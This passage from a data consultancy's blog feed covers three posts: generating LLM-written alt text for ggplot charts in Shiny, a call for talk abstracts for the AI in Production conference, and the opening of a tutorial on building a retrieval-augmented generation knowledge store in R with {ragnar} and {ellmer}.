&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The function has a few features that will keep the output more reliable:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Consistent image size and resolution - helps model reliability when
reading axes and labels.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Explicit cleanup of temporary files - we don’t need to save the images
once text is generated.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Error handling - if the model call fails, the app still returns usable
alt text. We kept our fallback text simple for demonstration purposes,
but you can attempt to add more detail.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;External model initialisation - only created once and passed in,
rather than re-created on every reactive update.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;In this section will just create a few example plots then see what the
LLM generates.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;simple_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Sepal.Width, Sepal.Length) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;simple_plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="simple_plot.png" alt="Scatter plot of the Iris data." width="672" /&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;simple_plot_alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_alt_text&lt;/span&gt;(simple_plot, gemini)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alt text generated by AI: &amp;#34;&lt;/span&gt;, simple_plot_alt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alt text generated by AI:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scatter plot showing Sepal.Length on the y-axis (ranging from
approximately 4.5 to 8.0) versus Sepal.Width on the x-axis (ranging
from approximately 2.0 to 4.5). The data points appear to form two
distinct clusters: one with Sepal.Width between 2.0 and 3.0 and
Sepal.Length between 5.0 and 8.0, and another with Sepal.Width between
3.0 and 4.5 and Sepal.Length between 4.5 and 6.5.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Sepal.Width, Sepal.Length, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="coloured_plot.png" alt="Scatter plot of the Iris data coloured by species." width="672" /&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot_alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_alt_text&lt;/span&gt;(plot, gemini)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alt text generated by AI: &amp;#34;&lt;/span&gt;, plot_alt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alt text generated by AI:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scatter plot showing Sepal.Length on the y-axis (range 4.5-8.0) versus
Sepal.Width on the x-axis (range 2.0-4.5), with points colored by
Species. Red points, labeled &amp;ldquo;setosa&amp;rdquo;, form a distinct cluster with
higher Sepal.Width (3.0-4.5) and lower Sepal.Length (4.5-5.8). Blue
points, &amp;ldquo;virginica&amp;rdquo;, tend to have higher Sepal.Length (5.5-8.0) and
moderate Sepal.Width (2.5-3.8). Green points, &amp;ldquo;versicolor&amp;rdquo;, are in
between, with moderate Sepal.Length (5.0-7.0) and Sepal.Width
(2.0-3.5), overlapping with virginica.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;complicated_plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(Sepal.Width, Sepal.Length, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_smooth&lt;/span&gt;(method &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lm&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;complicated_plot
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="complicated_plot.png" alt="Scatter plot of the Iris data coloured by species with overlayed line of best fit for each species." width="672" /&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;complicated_plot_alt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_alt_text&lt;/span&gt;(complicated_plot, gemini)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alt text generated by AI: &amp;#34;&lt;/span&gt;, complicated_plot_alt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Alt text generated by AI:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scatter plot showing Sepal.Length on the y-axis (range 4.0-8.0) versus
Sepal.Width on the x-axis (range 2.0-4.5). Points and linear
regression lines are colored by Iris species. Red points, “setosa”,
cluster with lower Sepal.Length (4.0-5.8) and higher Sepal.Width
(2.8-4.4). Green points, “versicolor”, and blue points, “virginica”,
largely overlap, showing higher Sepal.Length (5.0-8.0) and moderate
Sepal.Width (2.0-3.8), with “virginica” generally having the longest
sepals. All three species exhibit a positive linear correlation,
indicated by their respective regression lines and shaded confidence
intervals, where increasing sepal width corresponds to increasing
sepal length.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;As we can see the alt text can be very good and informative when using
LLMs. One alternative that I want to point out is actually including a
summary of the data behind the plot. This way screen reader users can
still gain insight from the plot.&lt;/p&gt;
&lt;h2 id="using-dynamic-alt-text-in-shiny"&gt;Using Dynamic Alt Text in Shiny&lt;/h2&gt;
&lt;p&gt;Once generated, the alt text can be supplied directly to the UI:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Via the &lt;code&gt;alt&lt;/code&gt; argument of &lt;code&gt;plotOutput()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Or injected into custom HTML for more complex layouts&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Because the text is generated from the rendered plot, it stays in sync
with user inputs and filters.&lt;/p&gt;
&lt;h2 id="other-considerations"&gt;Other Considerations&lt;/h2&gt;
&lt;p&gt;Some apps may be more complicated and/or have a high number of users.
These type of apps will need a bit more consideration to include
features like this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Caching alt text for unchanged plots to reduce API usage&lt;/li&gt;
&lt;li&gt;Prompt augmentation with known variable names or units&lt;/li&gt;
&lt;li&gt;Manual overrides for critical visuals&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="conclusion"&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;AI-generated alt text works best as a supporting tool, not a replacement
for accessibility review. I have also found it helpful to let users know
that the alt text is AI generated so they know to take it with a pinch
of salt.&lt;/p&gt;
&lt;p&gt;Dynamic alt text is a small feature with a big impact on inclusion. By
combining Shiny’s reactivity with consistent rendering, error handling,
and modern LLMs, we can make interactive data apps more accessible by
default whilst not increasing developer burden.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ellmer-dynamic-alt-text/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why Submit to AI in Production: Speaking as a Tool for Better Work</title><link>https://www.jumpingrivers.com/blog/why-submit-ai-in-production/</link><pubDate>Tue, 20 Jan 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-submit-ai-in-production/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-submit-ai-in-production/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-submit-ai-in-production/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re accepting abstracts for AI in Production until &lt;strong&gt;23rd January&lt;/strong&gt;. The conference takes place on &lt;strong&gt;4th–5th June 2026&lt;/strong&gt; in Newcastle, with talks on Friday 5th across two streams: one focused on engineering and production systems, the other on machine learning and model development.&lt;/p&gt;
&lt;p&gt;We often hear: “My work isn&amp;rsquo;t ready to talk about yet” or “I&amp;rsquo;m not sure anyone would be interested.” We want to address that hesitation directly.&lt;/p&gt;
&lt;p&gt;Speaking at a conference isn&amp;rsquo;t primarily about promoting yourself or your organisation.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s a practical tool that helps you do better work. Preparing and delivering a talk forces useful reflection, invites feedback from people facing similar challenges, and turns knowledge that lives only in your head into something your team can reuse.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re wondering whether your work qualifies: internal systems count, work in progress counts, partial success counts.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Submit your abstract by &lt;strong&gt;23rd January&lt;/strong&gt; &lt;a href="https://jumpingrivers.com/ai-production/" rel="external"&gt;on the AI in Production website.&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="preparing-a-talk-clarifies-your-decisions"&gt;Preparing a Talk Clarifies Your Decisions&lt;/h2&gt;
&lt;p&gt;When you sit down to explain a technical choice to an audience, you have to answer questions you might have glossed over at the time: Why did we build it this way? What constraints shaped our approach? What would we do differently now?&lt;/p&gt;
&lt;p&gt;This isn&amp;rsquo;t about justifying your decisions to others. It&amp;rsquo;s about understanding them yourself. The process of turning a production system into a coherent narrative forces you to see patterns you were too close to notice while building it. You identify what worked, what didn&amp;rsquo;t, and why. That clarity is valuable whether or not you ever give the talk.&lt;/p&gt;
&lt;p&gt;Many practitioners find that writing an abstract or outline reveals gaps in their thinking. A deployment strategy that seemed obvious in context becomes harder to explain without it. A monitoring approach that felt pragmatic reveals underlying assumptions. This friction is useful. It means you&amp;rsquo;re learning something about your own work.&lt;/p&gt;
&lt;h2 id="speaking-invites-useful-feedback"&gt;Speaking Invites Useful Feedback&lt;/h2&gt;
&lt;p&gt;The audience at AI in Production will broadly fall across two streams: engineering (building, shipping, maintaining, and scaling systems) and machine learning (model development, evaluation, and applied ML).&lt;/p&gt;
&lt;p&gt;Whether you&amp;rsquo;re working on infrastructure and deployment or on training pipelines and model behaviour, you&amp;rsquo;ll be in a room with people facing similar constraints: limited resources, shifting requirements, imperfect data, and operational pressures.&lt;/p&gt;
&lt;p&gt;When you share what you&amp;rsquo;ve tried, you get feedback from people who understand the context. Someone has solved a similar problem differently. Someone has run into the same failure mode. Someone asks a question that makes you reconsider an assumption.&lt;/p&gt;
&lt;p&gt;This kind of peer feedback is hard to get otherwise. Your team is too close to the work. Online discussions lack context. A conference talk puts your approach in front of people who can offer informed perspectives without having to understand your entire stack or organisational structure first.&lt;/p&gt;
&lt;h2 id="talks-help-share-responsibility-and-knowledge"&gt;Talks Help Share Responsibility and Knowledge&lt;/h2&gt;
&lt;p&gt;In many teams, knowledge about production systems sits with one or two people. They know why certain decisions were made, where the edge cases are, and how to interpret the monitoring dashboards. That concentration of knowledge creates risk.&lt;/p&gt;
&lt;p&gt;Preparing a talk is a forcing function for documentation. To explain your system to strangers, you have to articulate what&amp;rsquo;s currently tacit. That articulation becomes something your team can use: onboarding material, decision records, runbooks.&lt;/p&gt;
&lt;p&gt;Speaking also distributes responsibility. When you present work publicly, it stops being just yours. Your team shares ownership of the ideas. Others can critique, extend, or maintain them. This is particularly valuable for platform teams or infrastructure work, where the people who built something may not be the ones operating it six months later.&lt;/p&gt;
&lt;h2 id="turning-tacit-knowledge-into-reusable-material"&gt;Turning Tacit Knowledge into Reusable Material&lt;/h2&gt;
&lt;p&gt;Much of what you know about your production systems isn&amp;rsquo;t written down. You understand the failure modes, the workarounds, and the operational quirks. You know which metrics matter and which are noise. You remember why you made certain tradeoffs.&lt;/p&gt;
&lt;p&gt;A conference talk is an excuse to capture that knowledge. The slides become a reference. The abstract becomes a design document. The Q&amp;amp;A reveals what wasn&amp;rsquo;t clear and needs better documentation.&lt;/p&gt;
&lt;p&gt;Even if the talk itself is ephemeral, the process of preparing it leaves artefacts. You&amp;rsquo;ve already done the hard work of running the system. Speaking about it turns that experience into something others can learn from, and you can build on.&lt;/p&gt;
&lt;h2 id="your-work-is-worth-sharing"&gt;Your Work Is Worth Sharing&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re maintaining AI systems in production, you&amp;rsquo;re solving problems worth talking about. Making models reliable under load, keeping training pipelines maintainable, monitoring behaviour when ground truth is delayed or absent, and managing technical debt while shipping features.&lt;/p&gt;
&lt;p&gt;These are the problems practitioners face every day. Your approach won&amp;rsquo;t be perfect, and that&amp;rsquo;s the point. Talks about work in progress, about things that didn&amp;rsquo;t work, about compromises made under constraint are often more useful than polished success stories.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re looking for honest accounts of how people are actually building and operating AI systems. That might fit the engineering stream (deployment, infrastructure, monitoring, scaling) or the machine learning stream (training, evaluation, model behaviour, responsible data use). If you&amp;rsquo;re doing work in either area, you have something to contribute.&lt;/p&gt;
&lt;h2 id="submit-an-abstract"&gt;Submit an Abstract&lt;/h2&gt;
&lt;p&gt;The deadline is &lt;strong&gt;23rd January&lt;/strong&gt;. You&amp;rsquo;ll need a title and an abstract of up to 250 words. You don&amp;rsquo;t need a perfect story or a finished project. You need a problem you&amp;rsquo;ve worked on, some approaches you&amp;rsquo;ve tried, and some lessons you&amp;rsquo;ve learned.&lt;/p&gt;
&lt;p&gt;Think about what would be useful for someone six months behind you on a similar path. Think about what you wish someone had told you before you started. Think about the conversation you&amp;rsquo;d want to have with peers who understand the constraints you&amp;rsquo;re working under.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re not sure where to start, consider writing about one decision that shaped your system, one assumption that turned out to be wrong, or one constraint that changed your design. Good abstracts often start with a specific moment or choice rather than a broad overview.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Ready to submit? The deadline is &lt;strong&gt;23rd January&lt;/strong&gt;. Share one decision, one lesson, or one constraint from your production work:&lt;br&gt;
&lt;a href="https://jumpingrivers.com/ai-production/" rel="external"&gt;https://jumpingrivers.com/ai-production/&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you have questions about whether your work fits the conference, reach out at &lt;a href="mailto:events@jumpingrivers.com" rel="external"&gt;&lt;strong&gt;events@jumpingrivers.com&lt;/strong&gt;&lt;/a&gt;. We&amp;rsquo;re here to help make this easier.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-submit-ai-in-production/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Retrieval-Augmented Generation: Setting up a Knowledge Store in R</title><link>https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/</link><pubDate>Thu, 08 Jan 2026 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Happy New Year from the team at Jumping Rivers!&lt;/p&gt;
&lt;p&gt;Now that we’re well into the second-half of the 2020s, it’s a good time to
reflect on the changes that we have seen so far in this decade. In the
world of data science nothing has dominated headlines quite like the
rapid growth and uptake of generative artificial intelligence (GenAI).&lt;/p&gt;
&lt;p&gt;Large language models (LLMs) such as ChatGPT, Claude and Gemini have
incredible potential to streamline day-to-day tasks, whether that’s
processing vast amounts of information, providing a human-like chat
interface for customers or generating code. But they also come with
notable risks if not harnessed responsibly.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;Anyone that has interacted with these models is likely to have come
across &lt;strong&gt;hallucination&lt;/strong&gt;, where the model confidently presents false
information as though it is factually correct. This can happen for a
variety of reasons:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LLMs often have no access to real-time information: how would a model
that was trained last year know today’s date?&lt;/li&gt;
&lt;li&gt;The training data may be missing domain-specific information: can we
really trust an off-the-shelf model to have a good understanding of
pharmaceuticals and medicinal drugs?&lt;/li&gt;
&lt;li&gt;The model may be over-eager to come across as intelligent, so it
decides to provide a confident output rather than a more nuanced,
honest answer.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Often we need to give the model access to additional contextual
information before we can make it “production-ready”. We can achieve
this using a &lt;strong&gt;retrieval-augmented generation (RAG)&lt;/strong&gt; workflow. In this
blog post we will explore the steps involved and set up an example RAG
workflow using free and open source packages in R.&lt;/p&gt;
&lt;h2 id="what-is-rag"&gt;What is RAG?&lt;/h2&gt;
&lt;p&gt;In a typical interaction with an LLM we have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;A user prompt: the text that is submitted by the user.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;A response: the text that is returned by the LLM.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;(optional)&lt;/em&gt; A system prompt: additional instructions for how the LLM
should respond (for example,
&lt;code&gt;&amp;quot;You respond in approximately 10 words or less&amp;quot;&lt;/code&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In a RAG workflow we provide access to an external knowledge store which
can include text-based documents and webpages. Additional contextual
info is then retrieved from the knowledge store (hence &lt;strong&gt;“retrieval”&lt;/strong&gt;)
and added to the user prompt before it is sent. In doing so we can
expect to receive a higher quality output.&lt;/p&gt;
&lt;h2 id="how-does-it-work"&gt;How does it work?&lt;/h2&gt;
&lt;p&gt;Before going further, we must first introduce the concept of
&lt;strong&gt;vectorisation&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Contrary to what you might believe, LLMs do not understand non-numerical
text! They are mathematical models, meaning they can only ingest and
output numerical vectors.&lt;/p&gt;
&lt;p&gt;So how can a user interact with a model using plain English? The trick
is that mappings exist which are able to convert between numerical
vectors and text. These mappings are called “vector embeddings” and are
used to convert the user prompt into a vector representation before it
is passed to the LLM.&lt;/p&gt;
&lt;p&gt;So, when setting up our RAG knowledge store, we have to store the
information using a compatible vector representation. With this in mind,
let’s introduce a typical RAG workflow:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Content&lt;/strong&gt;: we decide which documents to include in the knowledge
store.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Extraction&lt;/strong&gt;: we extract the text from these documents in Markdown
format.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Chunking&lt;/strong&gt;: the Markdown content is split into contextual “chunks”
(for example, each section or subsection of a document might become
a chunk).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Vectorisation&lt;/strong&gt;: the chunks are “vectorised” (i.e. we convert them
into a numerical vector representation).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Index&lt;/strong&gt;: we create an index for our knowledge store which will be
used to retrieve relevant chunks of information.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Retrieval&lt;/strong&gt;: we register the knowledge store with our model
interface. Now, when a user submits a prompt, it will be combined
with relevant chunks of information before it is ingested by the
model.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;At the retrieval step, a matching algorithm is typically used so that
only highly relevant chunks are retrieved from the knowledge store. In
this way, we are able to keep the size of the user prompts (and any
incurred costs) to a minimum.&lt;/p&gt;
&lt;h2 id="setting-up-a-rag-workflow-in-r"&gt;Setting up a RAG workflow in R&lt;/h2&gt;
&lt;p&gt;We will make use of two packages which are available to install via the
&lt;a href="https://cran.r-project.org/" rel="external"&gt;Comprehensive R Archive Network (CRAN)&lt;/a&gt;.
Both are actively maintained by &lt;a href="https://posit.co/homepage-b/" rel="external"&gt;Posit&lt;/a&gt;
(formerly RStudio) and are free to install and use.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2026-retrieval-augmented-generation-database-workflow-r"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="ragnar"&gt;{ragnar}&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://ragnar.tidyverse.org/" rel="external"&gt;{ragnar}&lt;/a&gt; package provides functions
for extracting information from both text-based documents and webpages,
and provides vector embeddings that are compatible with popular LLM
providers including OpenAI and Google.&lt;/p&gt;
&lt;p&gt;We will use {ragnar} to build our knowledge store.&lt;/p&gt;
&lt;h3 id="ellmer"&gt;{ellmer}&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://ellmer.tidyverse.org/" rel="external"&gt;{ellmer}&lt;/a&gt; package allows us to
interact with a variety of LLM APIs from R. A complete list of supported
model providers can be found in the &lt;a href="https://ellmer.tidyverse.org/#providers" rel="external"&gt;package
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Note that, while {ellmer} is free to install and use, you will still
need to set up an API token with your preferred model provider before
you can interact with any models. We will use the free Google Gemini
tier for our example workflow. See the &lt;a href="https://ai.google.dev/gemini-api/docs/api-key" rel="external"&gt;Gemini API
documentation&lt;/a&gt; for
instructions on creating an API key, and the &lt;a href="https://ellmer.tidyverse.org/reference/chat_google_gemini.html" rel="external"&gt;{ellmer}
documentation&lt;/a&gt;
for authenticating with your API key from R.&lt;/p&gt;
&lt;h2 id="example-rag-workflow"&gt;Example RAG workflow&lt;/h2&gt;
&lt;p&gt;We begin by loading the {ragnar} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ragnar&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The URL provided below links to the &lt;a href="https://csgillespie.github.io/efficientR/" rel="external"&gt;title
page&lt;/a&gt; of the “Efficient R
Programming” textbook, written by Robin Lovelace and our very own Colin
Gillespie. We’re going to use a couple of chapters from the book to
construct a RAG knowledge store.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://csgillespie.github.io/efficientR/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s use {ragnar} to read the contents of this page into a Markdown
format.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;md &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_as_markdown&lt;/span&gt;(url)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We could vectorise this information as it is, but first we should split
it up into contextual chunks.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chunks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;markdown_chunk&lt;/span&gt;(md)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chunks
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # @document@origin: https://csgillespie.github.io/efficientR/&lt;/span&gt;
